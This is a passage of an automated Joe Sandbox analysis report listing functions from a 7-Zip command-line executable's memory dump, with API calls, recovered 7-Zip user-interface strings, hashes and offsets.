                                • Instruction Fuzzy Hash: 66B1A43135968992CB10EF32F5516AF6760F7C5B88F80112BEE8E97625CE7CC896C708
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove$ExceptionThrow
                                • String ID: incorrect update switch command$pqrxyzw
                                • API String ID: 3957182552-3922825594
                                • Opcode ID: 4dbbf3394c81694722ba41e8c04aeaf2ab8cd2185d22ae2639c85707d97c8b65
                                • Instruction ID: fd7c4fb7535536b3bb5cce0577f09a4531a2f13d5d81e1059d709ebba58055a7
                                • Opcode Fuzzy Hash: 4dbbf3394c81694722ba41e8c04aeaf2ab8cd2185d22ae2639c85707d97c8b65
                                • Instruction Fuzzy Hash: E081A532314A9992CB20EF26F4513AE6720F7C5B88F814117EE9E8B654DF7CC986C748
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove$ExceptionThrow$malloc
                                • String ID:
                                • API String ID: 3260709843-0
                                Strings
                                Similarity
                                • API ID:
                                • String ID: \$\\?\$\\?\UNC\
                                • API String ID: 0-1962706685
                                APIs
                                Strings
                                Similarity
                                • API ID: free$wcscmp$ExceptionThrowmemmove
                                • String ID: Empty file path
                                • API String ID: 3919112945-1562447899
                                APIs
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                APIs
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411E9F
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411EC3
                                Similarity
                                • API ID: ErrorLast
                                • String ID:
                                • API String ID: 1452528299-0
                                APIs
                                Similarity
                                • API ID: free$ErrorLastmemmove
                                • String ID:
                                • API String ID: 3561842085-0
                                APIs
                                Strings
                                Similarity
                                • API ID: free
                                • String ID: \\?\
                                • API String ID: 1294909896-4282027825
                                APIs
                                Strings
                                Similarity
                                • API ID: fputs$free$fputc
                                • String ID: Error:$ file$Everything is Ok$Scan WARNINGS for files and folders:$Scan WARNINGS: $WARNING: Cannot open $WARNINGS for files:
                                • API String ID: 2662072562-1527772849
                                APIs
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                APIs
                                Strings
                                Similarity
                                • API ID: free$ClearVariant
                                • String ID: 2$?$?$Z
                                • API String ID: 1677346816-1743634682
                                APIs
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                APIs
                                Strings
                                Similarity
                                • API ID: free$CountCurrentErrorLastTick$CreateDirectoryProcessThread
                                • String ID: .tmp$d
                                • API String ID: 503816515-2797371523
                                APIs
                                Similarity
                                • API ID: free$memmove
                                • String ID:
                                • API String ID: 1534225298-0
                                APIs
                                Strings
                                • zero size last volume is not allowed, xrefs: 00425062
                                • Incorrect volume size:, xrefs: 0042503C
                                Similarity
                                • API ID: free$memmove$ExceptionThrow
                                • String ID: Incorrect volume size:$zero size last volume is not allowed
                                • API String ID: 3957182552-998621408
                                APIs
                                Strings
                                Similarity
                                • API ID: free
                                • String ID: ..\
                                • API String ID: 1294909896-2756224523
                                APIs
                                Strings
                                Similarity
                                • API ID: fputs$free$fputc
                                • String ID: Modified: $Path: $Size:
                                • API String ID: 2662072562-3207571042
                                APIs
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                APIs
                                Strings
                                Similarity
                                • API ID: free$memmove
                                • String ID: : $ : MINOR_ERROR$...$Junction: $Link: $REPARSE:$WSL:
                                • API String ID: 1534225298-3981964144
                                APIs
                                Strings
                                Similarity
                                • API ID: free$AddressHandleModuleProc
                                • String ID: : $ SP:$RtlGetVersion$Windows$ntdll.dll
                                • API String ID: 399046674-586651410
                                APIs
                                Strings
                                Similarity
                                • API ID: fputs
                                • String ID: = $ERROR$ERRORS:$WARNING$WARNINGS:
                                • API String ID: 1795875747-2836439314
                                Similarity
                                • API ID: fputs$free
                                • String ID: $ MB$ Memory =
                                • API String ID: 3873070119-2616823926
                                APIs
                                • fputs.MSVCRT ref: 00462DA3
                                • fputs.MSVCRT ref: 00462DC0
                                • fputs.MSVCRT ref: 00462DD0
                                  • Part of subcall function 00412790: fputs.MSVCRT ref: 004127D9
                                  • Part of subcall function 00412790: free.MSVCRT ref: 004127E5
                                  • Part of subcall function 00412790: free.MSVCRT ref: 004127F0
                                • fputs.MSVCRT ref: 00462DEE
                                Similarity
                                • API ID: fputs$free
                                • String ID: : Cannot open the file as [$ERROR$Open $WARNING$] archive
                                • API String ID: 3873070119-657955069
                                Similarity
                                • API ID: free$AddressHandleModuleProc
                                • String ID: CreateHardLinkW$kernel32.dll
                                • API String ID: 399046674-294928789
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                Similarity
                                • API ID: ClearVariant
                                • String ID: \??\
                                • API String ID: 1473721057-3047946824
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove
                                • String ID: hash
                                • API String ID: 1534225298-3518522040
                                APIs
                                  • Part of subcall function 00411E58: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411E9F
                                • _CxxThrowException.MSVCRT ref: 004242EE
                                  • Part of subcall function 004138A8: free.MSVCRT ref: 004138E0
                                  • Part of subcall function 004139AC: memmove.MSVCRT ref: 004139D9
                                • free.MSVCRT ref: 004242A5
                                • _CxxThrowException.MSVCRT ref: 004242C8
                                • _CxxThrowException.MSVCRT ref: 00424322
                                • free.MSVCRT ref: 004243B6
                                • free.MSVCRT ref: 004243BE
                                • free.MSVCRT ref: 004243CC
                                Strings
                                • Incorrect item in listfile.Check charset encoding and -scs switch., xrefs: 004242D1, 00424305
                                • The file operation error for listfile, xrefs: 00424268
                                Similarity
                                • API ID: free$ExceptionThrow$ErrorLastmemmove
                                • String ID: Incorrect item in listfile.Check charset encoding and -scs switch.$The file operation error for listfile
                                • API String ID: 2826704872-1487508633
                                Similarity
                                • API ID: free$memmovewcscmp
                                • String ID:
                                • API String ID: 3584677832-0
                                APIs
                                  • Part of subcall function 004135B8: memmove.MSVCRT ref: 004135F0
                                  • Part of subcall function 00413958: memmove.MSVCRT ref: 00413997
                                • free.MSVCRT ref: 0042693E
                                • free.MSVCRT ref: 00426983
                                • free.MSVCRT ref: 004269B0
                                • free.MSVCRT ref: 004269E6
                                • free.MSVCRT ref: 00426A50
                                  • Part of subcall function 0041960C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,00000000,?,?,00000000,?,00000003,00000003), ref: 0041961E
                                Similarity
                                • API ID: free$memmove$CloseHandle
                                • String ID: :Zone.Identifier
                                • API String ID: 1247544577-2436405130
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                Similarity
                                • API ID: free$memmove
                                • String ID:
                                • API String ID: 1534225298-0
                                Similarity
                                • API ID: free
                                • String ID: /$\$a$z
                                • API String ID: 1294909896-3795456795
                                Similarity
                                • API ID: free$memmove
                                • String ID: crc$flags$memuse
                                • API String ID: 1534225298-339511674
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                Similarity
                                • API ID: free$memmove
                                • String ID:
                                • API String ID: 1534225298-0
                                Similarity
                                • API ID: memcmp
                                • String ID:
                                • API String ID: 1475443563-0
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 9a8387ae601500122f572f294227a66f10f0ad07e155eb24b92f1dd97e1a69c6
                                • Instruction ID: ae88b004c5f826645cd08b055d917e70f00a3c59fce02902785a452487d21c67
                                • Opcode Fuzzy Hash: 9a8387ae601500122f572f294227a66f10f0ad07e155eb24b92f1dd97e1a69c6
                                • Instruction Fuzzy Hash: 9101403228664D42C715FB32F6516AE5710E7C2B95F441127EE5A97721CE7CC4E78708
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 0816cad8a9ea06915a236e8603301d5263cf40a5a715ebb3b4369cad3db0b704
                                • Instruction ID: 7371351374e8099fcb39e8bc6c6764f9ee869e4b806337162ca18049512c7270
                                • Opcode Fuzzy Hash: 0816cad8a9ea06915a236e8603301d5263cf40a5a715ebb3b4369cad3db0b704
                                • Instruction Fuzzy Hash: EF01FF3228564D83C751F736F6516AE5710EBC6B99F401127EE2A97721CE7CC4EB8708
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: e186d5f6c2a6a8e5e5618b41f51224d408bf29008b427c36f0df3b9dac91f40b
                                • Instruction ID: 188c43c2a241b6bdc4f41e55fa77ee05e6aa9d2b459ac4a2f98f140259b66873
                                • Opcode Fuzzy Hash: e186d5f6c2a6a8e5e5618b41f51224d408bf29008b427c36f0df3b9dac91f40b
                                • Instruction Fuzzy Hash: A301FF3228564D43CB51F736F6516AE5310EBC2B99F402127EE2A97621DE7CC4EB870C
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: d16567f6c00b92bf3affa58cb78e9578cc7c9085ca4f2d812a04ae04698967dd
                                • Instruction ID: 897ef3f89f93d82ebd949510a1acbcfb057f7ccc658a170a771a0e77b606c8aa
                                • Opcode Fuzzy Hash: d16567f6c00b92bf3affa58cb78e9578cc7c9085ca4f2d812a04ae04698967dd
                                • Instruction Fuzzy Hash: 4201FB3228564E83CB51F736F6516AE5310EBC2B99F401127EE2A97621CE7CC5E7860C
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: ce6774dc4cefc2f10703df0088628459081cb7c9729eaeb008019dfa35909437
                                • Instruction ID: 6a6ff7ed4f1f77e6531d1d802e996b6f8714346139e32ec2fd460d2d0ec25ba5
                                • Opcode Fuzzy Hash: ce6774dc4cefc2f10703df0088628459081cb7c9729eaeb008019dfa35909437
                                • Instruction Fuzzy Hash: 09F0FB3228564D83CB51F736F6516AE5310EBC2B95F401127EE2A97621CE7CC4E78608
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 567f433233aab85a3815d1036ae4ca761e1692422187d0b75a72c43c8f0da7d1
                                • Instruction ID: abbd55726dc2dfa1fb3c45d862883bd8827f38a55976306c0c095568ffecb622
                                • Opcode Fuzzy Hash: 567f433233aab85a3815d1036ae4ca761e1692422187d0b75a72c43c8f0da7d1
                                • Instruction Fuzzy Hash: F9010072651A8D8ACB10AE37ED910AC1314EB85B9C7584637AE2D9F715DEACCCA28344
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: c46e5541d977855d1a0c37effd58fe58424e248d92aec372ebddbd1a340c7478
                                • Instruction ID: 695e9eb3bb3a859f7b7fa25ff7737dff87e9c006ebe3e86eccb566cc2d9e6ff9
                                • Opcode Fuzzy Hash: c46e5541d977855d1a0c37effd58fe58424e248d92aec372ebddbd1a340c7478
                                • Instruction Fuzzy Hash: C10144727506894AC710AE37ED911AC1320EB81B9D7484226AE1D9B755DE6CCCA28344
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove
                                • String ID: ??\
                                • API String ID: 1534225298-3933555804
                                • Opcode ID: 647aee96f56e6ea2199074f0ca06e49257a7263789404048bcb9741760ba45c4
                                • Instruction ID: d232cdbd57df880c2e25a8f4e3aabfcca4aeddf442fd649bf02cd917d299395c
                                • Opcode Fuzzy Hash: 647aee96f56e6ea2199074f0ca06e49257a7263789404048bcb9741760ba45c4
                                • Instruction Fuzzy Hash: 3C71797321668096CB20DF21D4101EE7320FB55788B88912BEB9A47714EB7DC9F6D30A
                                APIs
                                • free.MSVCRT ref: 00424872
                                  • Part of subcall function 004241F4: free.MSVCRT ref: 004242A5
                                  • Part of subcall function 004241F4: _CxxThrowException.MSVCRT ref: 004242C8
                                  • Part of subcall function 004241F4: _CxxThrowException.MSVCRT ref: 004242EE
                                  • Part of subcall function 004241F4: _CxxThrowException.MSVCRT ref: 00424322
                                • free.MSVCRT ref: 004248BB
                                • _CxxThrowException.MSVCRT ref: 004248FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ExceptionThrow$free
                                • String ID: Incorrect wildcard type marker$Too short switch$inorrect switch
                                • API String ID: 3129652135-3392774464
                                • Opcode ID: 75254e321aba016fd7ca34ce8b583dfbb945adc394beb129086a94450d6d3e0a
                                • Instruction ID: 5250dcb62d7afbd3650168a1cbd0f5f43e5589dab0fa9527ac0e79fca8cfaf91
                                • Opcode Fuzzy Hash: 75254e321aba016fd7ca34ce8b583dfbb945adc394beb129086a94450d6d3e0a
                                • Instruction Fuzzy Hash: 827116263186E0D5DB20DB25F4403AEAB61F7D1798FD04117EB8A47B68DBBCC896C709
                                APIs
                                • fputs.MSVCRT ref: 0046CC30
                                • fputs.MSVCRT ref: 0046CD17
                                  • Part of subcall function 0046B4D0: memset.MSVCRT ref: 0046B515
                                  • Part of subcall function 0046B4D0: fputs.MSVCRT ref: 0046B53A
                                  • Part of subcall function 00412790: fputs.MSVCRT ref: 004127D9
                                  • Part of subcall function 00412790: free.MSVCRT ref: 004127E5
                                  • Part of subcall function 00412790: free.MSVCRT ref: 004127F0
                                  • Part of subcall function 004124C4: fputc.MSVCRT ref: 004124D5
                                • fputs.MSVCRT ref: 0046CE03
                                  • Part of subcall function 004124A8: fflush.MSVCRT ref: 004124AF
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs$free$fflushfputcmemset
                                • String ID: ERROR: $ERRORS:$WARNINGS:
                                • API String ID: 2975459029-4064182643
                                • Opcode ID: 3ce92fbe1b35c5ec52de361611b6f157965ae34472b577e79a4e80d5b2bfd629
                                • Instruction ID: 4254177e66274b2cf9f7cf290ffb35f89914f4833fbc312029ac8099ce794598
                                • Opcode Fuzzy Hash: 3ce92fbe1b35c5ec52de361611b6f157965ae34472b577e79a4e80d5b2bfd629
                                • Instruction Fuzzy Hash: 31718F667006C595CE28EF26E6913BB6711F741B84F08402BDF9E87302EF6CD8A4835A
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputsmemsetstrlen$free
                                • String ID:
                                • API String ID: 2852212109-2735817509
                                • Opcode ID: 9a7147a006a768db9ea54475be91510b63d358eb6ce8c9524d123a3ef5e3e896
                                • Instruction ID: 2d22bbc2e04a46147c0487197a3e0881e2bc0a4de8dd74f4ceb8f7c7e3560c89
                                • Opcode Fuzzy Hash: 9a7147a006a768db9ea54475be91510b63d358eb6ce8c9524d123a3ef5e3e896
                                • Instruction Fuzzy Hash: 9051D372208A8096C720DB26E9503DFA7A1F385BC4F589527EF8A07B18EF7CC595CB05
                                APIs
                                • EnterCriticalSection.KERNEL32 ref: 0046064E
                                  • Part of subcall function 00413730: free.MSVCRT ref: 0041376A
                                  • Part of subcall function 00413730: memmove.MSVCRT(00000000,?,?,00000000,004110B0), ref: 00413785
                                • fputs.MSVCRT ref: 00460716
                                • fputs.MSVCRT ref: 004607F8
                                • fputs.MSVCRT ref: 00460814
                                • LeaveCriticalSection.KERNEL32 ref: 004608B6
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs$CriticalSection$EnterLeavefreememmove
                                • String ID: ???
                                • API String ID: 2578255354-1053719742
                                • Opcode ID: 2493a75a0bb9975d8930162c51ba8e1bee14d7ae64b68b26e2e51425f8a9db9c
                                • Instruction ID: 286b10f4b5256edc1cd81f800045f304151a3a774e5b7fbfe97cb01345c1de25
                                • Opcode Fuzzy Hash: 2493a75a0bb9975d8930162c51ba8e1bee14d7ae64b68b26e2e51425f8a9db9c
                                • Instruction Fuzzy Hash: DF615BB2300A81A2DB1DEB26D6943EA6320F784B89F444017DF1D47364EF78E5B9C349
                                APIs
                                • DeviceIoControl.KERNEL32 ref: 00419D32
                                • DeviceIoControl.KERNEL32 ref: 00419E16
                                • DeviceIoControl.KERNEL32 ref: 00419E6D
                                • DeviceIoControl.KERNEL32 ref: 00419EAE
                                  • Part of subcall function 0041BC48: GetModuleHandleW.KERNEL32 ref: 0041BC69
                                  • Part of subcall function 0041BC48: GetProcAddress.KERNEL32 ref: 0041BC79
                                  • Part of subcall function 0041BC48: GetDiskFreeSpaceW.KERNEL32 ref: 0041BCCA
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ControlDevice$AddressDiskFreeHandleModuleProcSpace
                                • String ID: ($:
                                • API String ID: 4250411929-4277925470
                                • Opcode ID: ce002fe7effc5463a8c12060252067aaf69f96b6df7ad79dc4c52b9bfb511346
                                • Instruction ID: 6beee3d6e1a2185157358bd05a64f998152d438c9a662f053817bfa754e0e5fe
                                • Opcode Fuzzy Hash: ce002fe7effc5463a8c12060252067aaf69f96b6df7ad79dc4c52b9bfb511346
                                • Instruction Fuzzy Hash: 20517D33609BC095C721CF20F06079EB7A4F784758F58851AEB8A47B98EB3DC895CB48
                                APIs
                                • EnterCriticalSection.KERNEL32 ref: 00460492
                                • fputs.MSVCRT ref: 004604F4
                                • fputs.MSVCRT ref: 00460520
                                  • Part of subcall function 0046B4D0: memset.MSVCRT ref: 0046B515
                                  • Part of subcall function 0046B4D0: fputs.MSVCRT ref: 0046B53A
                                • LeaveCriticalSection.KERNEL32 ref: 00460616
                                Strings
                                • with the file from archive:, xrefs: 00460516
                                • Would you like to replace the existing file:, xrefs: 004604ED
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs$CriticalSection$EnterLeavememset
                                • String ID: Would you like to replace the existing file:$with the file from archive:
                                • API String ID: 892811258-686978020
                                • Opcode ID: 601b029b9ada97ad12c09c0e40608fd2099026188d1b8f87dacac4d9d52ce1f0
                                • Instruction ID: 6e5c862d3a108e76b0b3fd8ad71c82b1ccdc244c3eb3ea6cef493dcf4e9d2684
                                • Opcode Fuzzy Hash: 601b029b9ada97ad12c09c0e40608fd2099026188d1b8f87dacac4d9d52ce1f0
                                • Instruction Fuzzy Hash: 7E41A0B2314685A6EB19DF26D9503AB6321F794B84F4481239F0E47751EF3CC894CB0A
                                APIs
                                Strings
                                • Enter password (will not be echoed):, xrefs: 0046D191
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ConsoleMode$Handlefflushfputs
                                • String ID: Enter password (will not be echoed):
                                • API String ID: 108775803-3720017889
                                • Opcode ID: 2a4e5efe55df4ec8f55cc8e5b7e692fd33b38d363443e79acfc80d1e455f2548
                                • Instruction ID: 4cb8e2d27307c72e98422c1a59d60a023db3adf3b12b469a39eda27e9bab0ca0
                                • Opcode Fuzzy Hash: 2a4e5efe55df4ec8f55cc8e5b7e692fd33b38d363443e79acfc80d1e455f2548
                                • Instruction Fuzzy Hash: DD210D61F0568183EE189B65AD5037A6350AB85BB4F184326DF1F877E0FF6CC885C309
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: CriticalSectionfputs$EnterLeavefree
                                • String ID: :
                                • API String ID: 1989314732-3653984579
                                • Opcode ID: 8ba75d28dd331cce65981d77e998c4092c08d57d4028349734a31fdcd73601a5
